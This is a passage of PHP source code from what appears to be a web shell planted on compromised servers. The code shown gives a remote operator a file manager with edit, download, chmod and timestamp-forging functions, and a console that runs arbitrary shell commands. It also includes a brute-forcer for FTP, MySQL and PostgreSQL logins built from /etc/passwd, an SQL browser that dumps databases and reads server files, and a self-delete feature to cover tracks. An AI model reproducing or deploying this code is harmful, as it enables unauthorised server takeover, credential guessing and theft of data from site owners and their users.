  <form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'><span>Name</span></a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'><span>Size</span></a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'><span>Modified Date</span></a></th><th><span>Owner/Group</span></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'><span>Permissions</span></a></th><th><span>Actions</span></th></tr>";
  $dirs = $files= array();
  $n = count($dirContent);
  for($i = 0;$i < $n;$i++){
    $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
    $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
    $tmp= array('name'  => $dirContent[$i],
      'path'  => $GLOBALS['cwd'].$dirContent[$i],
      'modify'=> date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'].$dirContent[$i])),
      'perms' => mocPermsColor($GLOBALS['cwd'].$dirContent[$i]),
      'size'  => @filesize($GLOBALS['cwd'].$dirContent[$i]),
      'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
      'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
    );
    if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
    $files[] = array_merge($tmp, array('type'=> 'file'));
    elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
    $dirs[] = array_merge($tmp, array('type'=> 'link','link'=> readlink($tmp['path'])));
    elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i]) && ($dirContent[$i] != "."))
    $dirs[] = array_merge($tmp, array('type'=> 'dir'));
  }
  $GLOBALS['sort'] = $sort;
  function mocCmp($a, $b){
    if($GLOBALS['sort'][0] != 'size')
    return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]])) * ($GLOBALS['sort'][1]?1: - 1);
    else
    return (($a['size'] < $b['size']) ? - 1 : 1) * ($GLOBALS['sort'][1]?1: - 1);
  }
  function mocGetExt($str){
    $pos = strrpos($str, ".");
    if($pos) $extension = substr($str, $pos+1, strlen($str)-$pos);
    return $extension;
  }
  usort($files, "mocCmp");
  usort($dirs, "mocCmp");
  $files = array_merge($dirs, $files);
  $v     = 0;
  foreach($files as $f){
    echo '<tr'.($v?' class=h_a':' class=h_b').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \''.((stristr(mocGetExt($f['name']),'php')?'highlight':'view')).'\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" '.(empty($f['link'])?'':"title='{$f['link']}'").'><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?mocViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
   .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
    $v = $v?0:1;
  }
  echo "</td></tr></table><div class=option>
  <input type=hidden name=a value='FilesMan'>
  <input type=hidden name=c value='".htmlspecialchars($GLOBALS['cwd'])."'>
  <input type=hidden name=charset value='".(isset($_POST['charset'])?$_POST['charset']:'')."'>
  <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
  if(class_exists('ZipArchive'))
  echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
  echo "<option value='tar'>Compress (tar.gz)</option>";
  if(!empty($_COOKIE['act']) && @count($_COOKIE['f']))
  echo "<option value='paste'>Paste / Compress</option>";
  echo "</select>&nbsp;";
  if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act']=='zip') || ($_COOKIE['act']=='tar')))
  echo "file name: <input type=text name=p2 value='moc_".date("Ymd_His").".".($_COOKIE['act']=='zip'?'zip':'tar.gz')."'>&nbsp;";
  echo "<input id=return type='submit' value='Confirm'></div></form>";
  mocFooter();
}
function ActionStringTools(){
  if(!function_exists('hex2bin')){
    function hex2bin($p){
      return decbin(hexdec($p));
    }
  }
  if(!function_exists('binhex')){
    function binhex($p){
      return dechex(bindec($p));
    }
  }
  if(!function_exists('hex2ascii')){
    function hex2ascii($p){
      $r = '';
      for($i = 0;$i < strLen($p);$i += 2){
        $r .= chr(hexdec($p[$i].$p[$i + 1]));
      }return $r;
    }
  }
  if(!function_exists('ascii2hex')){
    function ascii2hex($p){
      $r = '';
      for($i = 0;$i < strlen($p);++$i)$r .= sprintf('%02X', ord($p[$i])); return strtoupper($r);
    }
  }
  if(!function_exists('full_urlencode')){
    function full_urlencode($p){
      $r = '';
      for($i = 0;$i < strlen($p);++$i)$r .= '%'.dechex(ord($p[$i])); return strtoupper($r);
    }
  }
  $stringTools = array(
    'Base64 encode'       => 'base64_encode',
    'Base64 decode'       => 'base64_decode',
    'Url encode'          => 'urlencode',
    'Url decode'          => 'urldecode',
    'Full urlencode'      => 'full_urlencode',
    'md5 hash'            => 'md5',
    'sha1 hash'           => 'sha1',
    'crypt'               => 'crypt',
    'CRC32'               => 'crc32',
    'ASCII to HEX'        => 'ascii2hex',
    'HEX to ASCII'        => 'hex2ascii',
    'HEX to DEC'          => 'hexdec',
    'HEX to BIN'          => 'hex2bin',
    'DEC to HEX'          => 'dechex',
    'DEC to BIN'          => 'decbin',
    'BIN to HEX'          => 'binhex',
    'BIN to DEC'          => 'bindec',
    'String to lower case'=> 'strtolower',
    'String to upper case'=> 'strtoupper',
    'Htmlspecialchars'    => 'htmlspecialchars',
    'String length'       => 'strlen',
  );
  if(isset($_POST['ajax'])){
    mocSetCookie(md5($_SERVER['HTTP_HOST']).'ajax', true);
    ob_start();
    if(in_array($_POST['p1'], $stringTools))
    echo $_POST['p1']($_POST['p2']);
    $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0")."';\n";
    echo strlen($temp), "\n", $temp;
    exit;
  }
  if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  mocSetCookie(md5($_SERVER['HTTP_HOST']).'ajax', 0);
  mocHeader();
  echo '<div id=title><h1>String Conversions</h1></div><div class=option>';
  echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
  foreach($stringTools as $k => $v)
  echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
  echo "</select><input id=return type='submit' value='Submit'> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX</div>
  <textarea name='input' class=area>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form>
  <pre class=code style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id=strOutput>";
  if(!empty($_POST['p1'])){
    if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
  }
  echo"</pre></div><div id=content>
  <div id=title><h1>Search Files</h1></div>
  <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\">
  <table cellpadding=3 cellspacing=2 width='100%'>
  <tr><th><span>Text</span></th><th><span>Path</span></th><th><span>Name</span></th></tr>
  <th><input type='text' name='text' style='width:99.5%'></th>
  <th><input type='text' name='cwd' value='".htmlspecialchars($GLOBALS['cwd'])."' style='width:99.5%'></th>
  <th><input type='text' name='filename' value='*' style='width:99.5%'></td>
  <td><input id=return type=submit value=Search></td></tr>
  </table></form>";
  function mocRecursiveGlob($path){
    if(substr($path, - 1) != '/')
    $path .= '/';
    $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
    if(is_array($paths) && @count($paths)){
      foreach($paths as $item){
        if(@is_dir($item)){
          if($path != $item)
          mocRecursiveGlob($item);
        }
        else{
          if(empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2']) !== false)
          echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\",\"\")'>".htmlspecialchars($item)."</a><br>";
        }
      }
    }
  }
  if(@$_POST['p3'])
  mocRecursiveGlob($_POST['c']);
  mocFooter();
}
function ActionFilesTools(){
  if(isset($_POST['p1']))
  $_POST['p1'] = urldecode($_POST['p1']);
  if(@$_POST['p2']=='download'){
    if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])){
      ob_start("ob_gzhandler", 4096);
      header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
      if(function_exists("mime_content_type")){
        $type = @mime_content_type($_POST['p1']);
        header("Content-Type: ".$type);
      }
      else
      header("Content-Type: application/octet-stream");
      $fp = @fopen($_POST['p1'], "r");
      if($fp){
        while(!@feof($fp))
        echo @fread($fp, 1024);
        fclose($fp);
      }
    }exit;
  }
  if(@$_POST['p2']=='mkfile'){
    if(!file_exists($_POST['p1'])){
      $fp = @fopen($_POST['p1'], 'w');
      if($fp){
        $_POST['p2'] = "edit";
        fclose($fp);
      }
    }
  }
  mocHeader();
  echo '<div id=title><h1>File Tools</h1></div>';
  if(!file_exists(@$_POST['p1'])){
    echo '<div id=error>Can not read file.</div>';
    mocFooter();
    return;
  }
  $uid = @posix_getpwuid(@fileowner($_POST['p1']));
  if(!$uid){
    $uid['name'] = @fileowner($_POST['p1']);
    $gid['name'] = @filegroup($_POST['p1']);
  }
  else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
  echo '<table cellpadding=3 cellspacing=2 width=100%>
  <tr>
  <td align=right><span>File Name</span></td><td width=40%>'.htmlspecialchars(@basename($_POST['p1'])).' ('.(is_file($_POST['p1'])?mocViewSize(filesize($_POST['p1'])):'-').')</td>
  <td align=right><span>Created Time</span></td><td width=40%>'.date('Y-m-d H:i:s', filectime($_POST['p1'])).'</td>
  </tr>
  <td align=right><span>Owner/Group</span></td><td width=40%>'.$uid['name'].'/'.$gid['name'].'</td>
  <td align=right><span>Modified</span></td><td width=40%>'.date('Y-m-d H:i:s', filemtime($_POST['p1'])).'</td>
  </tr>
  <td align=right><span>Permission</span></td><td width=40%>'.mocPermsColor($_POST['p1']).'</td>
  <td align=right><span>Last Access</span></td><td width=40%>'.date('Y-m-d H:i:s', fileatime($_POST['p1'])).'</td>
  </td></tr></table><div class=option style="margin-top: 0px;">';
  if(empty($_POST['p2']))
  $_POST['p2'] = 'view';
  if(is_file($_POST['p1']))
  $m = array('Edit','Highlight','View','Download','Hexdump','Rename','Chmod','Touch');
  else
  $m = array('Rename','Chmod','Touch');
  foreach($m as $v)
  echo '<a href=# onclick="g(null,null,\''.urlencode($_POST['p1']).'\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<font color=#ddd>[ '.strtolower($v).' ]</font>':$v).'</a> ';
  echo '</div>';
  function mocHighlighter($phpath){
    $code = @highlight_file($phpath, true);
    $code = str_replace(array('<span ','</span>', '#FF8000'), array('<font ','</font>', '#D69453'), $code);
    $rezz = explode("<br />", $code);
    $clas = 0;
    $arrz = array(); $colz = array();
    echo "<div id=code><table border=0 cellspacing=1 cellpadding=0>";
    foreach ($rezz as $key => $value){
        $str = preg_match("/<font style=(.*)>/siU", trim($value), $match);
        $end = preg_match("/<\/font>/siU", trim($value));
        if($str and $end){ $line = $value; $arrz[($key+1)] = $match[0]; $colz[($key+1)] = $match[0]; }
        elseif($str and !$end){ $line = $match[0].$value."</font>"; $arrz[($key+1)] = $match[0]; $colz[($key+1)] = $match[0]; }
        elseif(!$str and $end){ $line = $colz[$key].$value; $arrz[($key+1)] = null; $colz[($key+1)] = $colz[$key];  }
        elseif(!$str and !$end){ $line = $colz[$key].$value."</font>"; $arrz[($key+1)] = null; $colz[($key+1)] = $colz[$key];  }
        else{ $line = $value; $arrz[($key+1)] = $match[0]; $colz[($key+1)] = $match[0]; }
        echo "<tr><td class=h_h onselectstart='return false'>&nbsp;<i>".($key+1)."</i>&nbsp;</td> <td".($clas?' class=h_c':' class=h_d').">".$line."</td>"."\n";
        $clas = $clas?0:1;
    }
    unset($colz); unset($arrz);
    echo "</table></div><hr>";
  }
  switch($_POST['p2']){
    case 'view':
    echo '<pre class=hasil>';
    $fp = @fopen($_POST['p1'], 'r');
    if($fp){
      while(!@feof($fp))
      echo htmlspecialchars(@fread($fp, 1024));
      @fclose($fp);
    }
    echo '</pre>';
    break;
    case 'highlight':
    if(@is_readable($_POST['p1'])) mocHighlighter($_POST['p1']);
    break;
    case 'chmod':
    if(!empty($_POST['p3'])){
      $perms = 0;
      for($i = strlen($_POST['p3']) - 1;$i >= 0;--$i)
      $perms += (int)$_POST['p3'][$i] * pow(8, (strlen($_POST['p3']) - $i - 1));
      if(!@chmod($_POST['p1'], $perms)){
        clearstatcache();
        echo '<div id=error>Can not set permissions => [ '.$_POST['p1'].' ]</div><script>document.mf.p3.value="";</script>';
      }
      else{
        clearstatcache();
        echo '<div id=success>[ '.$_POST['p1'].' ] => [ '.substr(sprintf('%o', fileperms($_POST['p1'])), - 4).' ]</div><script>document.mf.p3.value="";</script>';
      }
    }
    echo '<script>p3_="";</script><div class=option><form onsubmit="g(null,null,\''.urlencode($_POST['p1']).'\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])), - 4).'"><input id=return type=submit value="Chmod"></form></div>';
    break;
    case 'edit':
    if(!is_writable($_POST['p1'])){
      echo '<div id=error>File [ '.$_POST['p1'].' ] is not writable.</div>';
      break;
    }
    if(!empty($_POST['p3'])){
      $time = @filemtime($_POST['p1']);
      $_POST['p3'] = substr($_POST['p3'], 1);
      $fp = @fopen($_POST['p1'], "w");
      if($fp){
        @fwrite($fp, $_POST['p3']);
        @fclose($fp);
        echo '<div id=success>File [ '.$_POST['p1'].' ] saved.</div><script>p3_="";</script>';
        @touch($_POST['p1'], $time, $time);
      }
    }
    echo '<div class=option><form onsubmit="g(null,null,\''.urlencode($_POST['p1']).'\',null,\'1\'+this.text.value);return false;"><textarea name=text class=area>';
    $fp = @fopen($_POST['p1'], 'r');
    if($fp){
      while(!@feof($fp))
      echo htmlspecialchars(@fread($fp, 1024));
      @fclose($fp);
    }
    echo '</textarea><input id=return type=submit value="Save"></form></div>';
    break;
    case 'hexdump':
    $c = @file_get_contents($_POST['p1']);
    $n = 0;
    $h = array('00000000<br>','','');
    $len = strlen($c);
    for($i = 0; $i < $len; ++$i){
      $h[1] .= sprintf('%02X', ord($c[$i])).' ';
      switch(ord($c[$i])){
        case 0:  $h[2] .= ' '; break;
        case 9:  $h[2] .= ' '; break;
        case 10: $h[2] .= ' '; break;
        case 13: $h[2] .= ' '; break;
        default: $h[2] .= $c[$i]; break;
      }
      $n++;
      if($n==32){
        $n = 0;
        if($i + 1 < $len){
          $h[0] .= sprintf('%08X', $i + 1).'<br>';
        }
        $h[1] .= '<br>';
        $h[2] .= "\n";
      }
    }
    echo '<table cellspacing=1 cellpadding=5 width=100%><tr><td><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td><pre>'.$h[1].'</pre></td><td><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
    break;
    case 'rename':
    if(!empty($_POST['p3'])){
      if(!@rename($_POST['p1'], $_POST['p3']))
      echo '<div id=error>Can not rename "'.$_POST['p1'].'" => "'.$_POST['p3'].'"</div>';
      else
      die('<script>g(null,null, "'.urlencode($_POST['p3']).'",null, "")</script>');
    }
    echo '<div class=option><form onsubmit="g(null,null,\''.urlencode($_POST['p1']).'\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input id=return type=submit value="Rename"></form></div>';
    break;
    case 'touch':
    if(!empty($_POST['p3'])){
      $time = strtotime($_POST['p3']);
      if($time){
        if(!touch($_POST['p1'], $time, $time))
        echo '<div id=error>Can not touch the file! Check the permissions.</div>';
        else{
          clearstatcache();
          echo '<div id=success>File [ '.$_POST['p1'].' ] => [ '.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).' ] touched.</div>';
        }
      }
      else echo '<div id=error>Invalid date format.</div>';
    }
    clearstatcache();
    echo '<script>p3_="";</script><div class=option><form onsubmit="g(null,null,\''.urlencode($_POST['p1']).'\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input id=return type=submit value="Touch"></form></div>';
    break;
  }
  mocFooter();
}
function ActionConsole(){
  if(!empty($_POST['p1']) && !empty($_POST['p2'])){
    mocSetCookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true);
    $_POST['p1'] .= ' 2>&1';
  }
  elseif(!empty($_POST['p1']))
  mocSetCookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0);
  if(isset($_POST['ajax'])){
    mocSetCookie(md5($_SERVER['HTTP_HOST']).'ajax', true);
    ob_start();
    echo "d.cf.cmd.value='';\n";
    $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".mocCommand($_POST['p1']), "\n\r\t\\'\0"));
    if(preg_match("!.*cd\s+([^;]+)$!", $_POST['p1'], $match)){
      if(@chdir($match[1])){
        $GLOBALS['cwd'] = @getcwd();
        echo "c_='".$GLOBALS['cwd']."';";
      }
    }
    echo "d.cf.output.value+='".$temp."';";
    echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
    $temp = ob_get_clean();
    echo strlen($temp), "\n", $temp;
    exit;
  }
  if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  mocSetCookie(md5($_SERVER['HTTP_HOST']).'ajax', 0);
  mocHeader();
  echo "<script>
  if(window.Event) window.captureEvents(Event.KEYDOWN);
  var cmds = new Array('');
  var cur = 0;
  function kp(e) {
  var n = (window.Event) ? e.which : e.keyCode;
  if(n == 38) {
  cur--;
  if(cur>=0)
  document.cf.cmd.value = cmds[cur];
  else
  cur++;
  } else if(n == 40) {
  cur++;
  if(cur < cmds.length)
  document.cf.cmd.value = cmds[cur];
  else
  cur--;
  }
  }
  function add(cmd) {
  cmds.pop();
  cmds.push(cmd);
  cmds.push('');
  cur = cmds.length-1;
  }
  </script>";
  echo '<div id=title><h1>Console</h1></div><div class=option><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
  foreach($GLOBALS['aliases'] as $n => $v){
    if($v==''){
      echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
      continue;
    }
    echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
  }
  echo '</select><input id=return type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value="Execute"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2']) || $_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr></div><textarea name=output readonly>';
  if(!empty($_POST['p1'])){
    echo htmlspecialchars("$ ".$_POST['p1']."\n".mocCommand($_POST['p1']));
  }
  echo '</textarea><table cellpadding=0 cellspacing=2 width="100%"><tr><th id=return width="1.5%">$</th><td><input type=text name=cmd style="width:99.7%" onkeydown="kp(event);"></td></tr></table>';
  echo '</form><script>d.cf.cmd.focus();</script>';
  mocFooter();
}
function ActionLogout(){
  setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
  mocLogin();
}
function ActionSelfRemove(){
  if($_POST['p1']=='yes'){
    $phpself = preg_replace('!\(\d+\)\s.*!', '', __FILE__);
    if(@unlink($phpself)){
        die('<center><h1>The End</h1></center>');
    } else {
        mocHeader();
        echo '<div id=error>Could not remove [ '.$phpself.' ]</div>';
        mocFooter();
    }
  }
  if($_POST['p1'] != 'yes'){
    mocHeader();
    echo '<div id=title><h1>Suicide</h1></div><div class=option><center><form><input id=return style="width:99.7%" type=button onclick="g(null,null,\'yes\'); parent.location=\'#\';" value="Confirmation! You will no longer have access to this shell"></form></center></div>';
    mocFooter();
  }
}
function ActionBruteforce(){
  mocHeader();
  if(isset($_POST['proto'])){
    echo '<div id=title><h1>Bruteforce</h1></div><form method=post><table width=100% cellpadding=3 cellspacing=2>
    <tr><th><span>Type</span></th><td width=40%>'.strtoupper(htmlspecialchars($_POST['proto'])).'</td>
    <th><span>Type</span></th><td width=40%>'.htmlspecialchars($_POST['server']).'</td></tr></table>';
    echo '<div calss=option>';
    if($_POST['proto']=='ftp'){
      function mocBruteForce($ip, $port, $login, $pass){
        $fp = @ftp_connect($ip, $port?$port:21);
        if(!$fp) return false;
        $res = @ftp_login($fp, $login, $pass);
        @ftp_close($fp);
        return $res;
      }
    }
    elseif($_POST['proto']=='mysql'){
      function mocBruteForce($ip, $port, $login, $pass){
        $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
        @mysql_close($res);
        return $res;
      }
    }
    elseif($_POST['proto']=='pgsql'){
      function mocBruteForce($ip, $port, $login, $pass){
        $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
        $res = @pg_connect($str);
        @pg_close($res);
        return $res;
      }
    }
    $success = 0;
    $attempts= 0;
    $server  = explode(":", $_POST['server']);
    if($_POST['type']==1){
      $temp = @file('/etc/passwd');
      if(is_array($temp))
      foreach($temp as $line){
        $line = explode(":", $line);
        ++$attempts;
        if(mocBruteForce(@$server[0],@$server[1], $line[0], $line[0])){
          $success++;
          echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
        }
        if(@$_POST['reverse']){
          $tmp = "";
          for($i = strlen($line[0]) - 1; $i >= 0; --$i)
          $tmp .= $line[0][$i];
          ++$attempts;
          if(mocBruteForce(@$server[0],@$server[1], $line[0], $tmp)){
            $success++;
            echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
          }
        }
      }
    }
    elseif($_POST['type']==2){
      $temp = @file($_POST['dict']);
      if(is_array($temp))
      foreach($temp as $line){
        $line = trim($line);
        ++$attempts;
        if(mocBruteForce($server[0],@$server[1], $_POST['login'], $line)){
          $success++;
          echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
        }
      }
    }
    echo '</div>';
    echo "<table width=100% cellpadding=3 cellspacing=2>
    <tr><th><span>Attemps</span></th><td width=40%>$attempts</td>
    <th><span>Success</span></th><td width=40%>$success</td></tr></table>";
  }
  echo '<div id=title><h1>Bruteforce</h1></div><form method=post><table width=100% cellpadding=3 cellspacing=2>
  <tr><th><span>Type</span></th><td width=40%>
  <select name=proto><option value=ftp>FTP</option><option value=mysql>MySQL</option><option value=pgsql>PostgreSQL</option></select>
  <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
  <input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">
  <input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'"></td>
  <th><span>Username</span></th><td width=40%><input type=text name=login value="root"></td></tr>
  <tr><th><span>Server[:Port]</span></th><td width=40%><input type=text name=server value="127.0.0.1"></td>
  <th><span>Dictionary</span></th><td width=40%><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr>
  <tr><th><span>Options</span></th><td width=40%><label><input type=radio name=type value="1" checked> /etc/passwd</label><br>
  <label><input type=checkbox name=reverse value=1 checked> reverse (Login => nigoL)</label></td>
  <th><input id=return type=submit value="Brute"></td>
  </td><td width=40%><label><input type=radio name=type value="2"> Use dictionary</label></td></tr></form></table>';
  mocFooter();
}
function ActionSql(){
  class DbClass{
    var $type;
    var $link;
    var $res;
    function DbClass($type){
      $this->type = $type;
    }
    function connect($host, $user, $pass, $dbname){
      switch($this->type){
        case 'mysql':
        if($this->link = @mysql_connect($host, $user, $pass, true)) return true;
        break;
        case 'pgsql':
        $host = explode(':', $host);
        if(!$host[1]) $host[1] = 5432;
        if($this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname")) return true;
        break;
      }
      return false;
    }
    function selectdb($db){
      switch($this->type){
        case 'mysql':
        if(@mysql_select_db($db))return true;
        break;
      }
      return false;
    }
    function query($str){
      switch($this->type){
        case 'mysql':
        return $this->res = @mysql_query($str);
        break;
        case 'pgsql':
        return $this->res = @pg_query($this->link, $str);
        break;
      }
      return false;
    }
    function fetch(){
      $res = func_num_args()?func_get_arg(0):$this->res;
      switch($this->type){
        case 'mysql':
        return @mysql_fetch_assoc($res);
        break;
        case 'pgsql':
        return @pg_fetch_assoc($res);
        break;
      }
      return false;
    }
    function listDbs(){
      switch($this->type){
        case 'mysql':
        return $this->query("SHOW databases");
        break;
        case 'pgsql':
        return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
        break;
      }
      return false;
    }
    function listTables(){
      switch($this->type){
        case 'mysql':
        return $this->res = $this->query('SHOW TABLES');
        break;
        case 'pgsql':
        return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
        break;
      }
      return false;
    }
    function error(){
      switch($this->type){
        case 'mysql':
        return @mysql_error();
        break;
        case 'pgsql':
        return @pg_last_error();
        break;
      }
      return false;
    }
    function setCharset($str){
      switch($this->type){
        case 'mysql':
        if(function_exists('mysql_set_charset'))
        return @mysql_set_charset($str, $this->link);
        else
        $this->query('SET CHARSET '.$str);
        break;
        case 'pgsql':
        return @pg_set_client_encoding($this->link, $str);
        break;
      }
      return false;
    }
    function loadFile($str){
      switch($this->type){
        case 'mysql':
        return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
        break;
        case 'pgsql':
        $this->query("CREATE TABLE moc2(file text);COPY moc2 FROM '".addslashes($str)."';select file from moc2;");
        $r = array();
        while($i = $this->fetch())
        $r[] = $i['file'];
        $this->query('drop table moc2');
        return array('file'=>implode("\n", $r));
        break;
      }
      return false;
    }
    function dump($table, $fp = false){
      switch($this->type){
        case 'mysql':
        $res    = $this->query('SHOW CREATE TABLE `'.$table.'`');
        $create = mysql_fetch_array($res);
        $sql    = $create[1].";\n";
        if($fp) fwrite($fp, $sql);
        else echo($sql);
        $this->query('SELECT * FROM `'.$table.'`');
        $i    = 0;
        $head = true;
        while($item = $this->fetch()){
          $sql = '';
          if($i % 1000==0){
            $head = true;
            $sql = ";\n\n";
          }
          $columns = array();
          foreach($item as $k=>$v){
            if($v === null)
            $item[$k] = "NULL";
            elseif(is_int($v))
            $item[$k] = $v;
            else
            $item[$k] = "'".@mysql_real_escape_string($v)."'";
            $columns[] = "`".$k."`";
          }
          if($head){
            $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
            $head = false;
          }
          else
          $sql .= "\n\t,(".implode(", ", $item).')';
          if($fp) fwrite($fp, $sql);
          else echo($sql);
          $i++;
        }
        if(!$head)
        if($fp) fwrite($fp, ";\n\n");
        else echo(";\n\n");
        break;
        case 'pgsql':
        $this->query('SELECT * FROM '.$table);
        while($item = $this->fetch()){
          $columns = array();
          foreach($item as $k=>$v){
            $item[$k] = "'".addslashes($v)."'";
            $columns[] = $k;
          }
          $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
          if($fp) fwrite($fp, $sql);
          else echo($sql);
        }
        break;
      }
      return false;
    }
  };
  $db = new DbClass($_POST['type']);
  if(@$_POST['p2']=='download'){
    $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
    $db->selectdb($_POST['sql_base']);
    switch($_POST['charset']){
      case "Windows-1251": $db->setCharset('cp1251'); break;
      case "UTF-8": $db->setCharset('utf8'); break;
      case "KOI8-R": $db->setCharset('koi8r'); break;
      case "KOI8-U": $db->setCharset('koi8u'); break;
      case "cp866": $db->setCharset('cp866'); break;
    }
    if(empty($_POST['file'])){
      ob_start("ob_gzhandler", 4096);
      header("Content-Disposition: attachment; filename=dump.sql");
      header("Content-Type: text/plain");
      foreach($_POST['tbl'] as $v)
      $db->dump($v);
      exit;
    }
    elseif($fp = @fopen($_POST['file'], 'w')){
      foreach($_POST['tbl'] as $v)
      $db->dump($v, $fp);
      fclose($fp);
      unset($_POST['p2']);
    }
    else
    die('<script>alert("Error! Can not open file");window.history.back(-1)</script>');
  }
  mocHeader();
  echo "<div id=title><h1>SQL Browser</h1></div>
  <form name='sf' method='post' onsubmit='fs(this);'>
  <table width=100% cellpadding=3 cellspacing=2><tr>
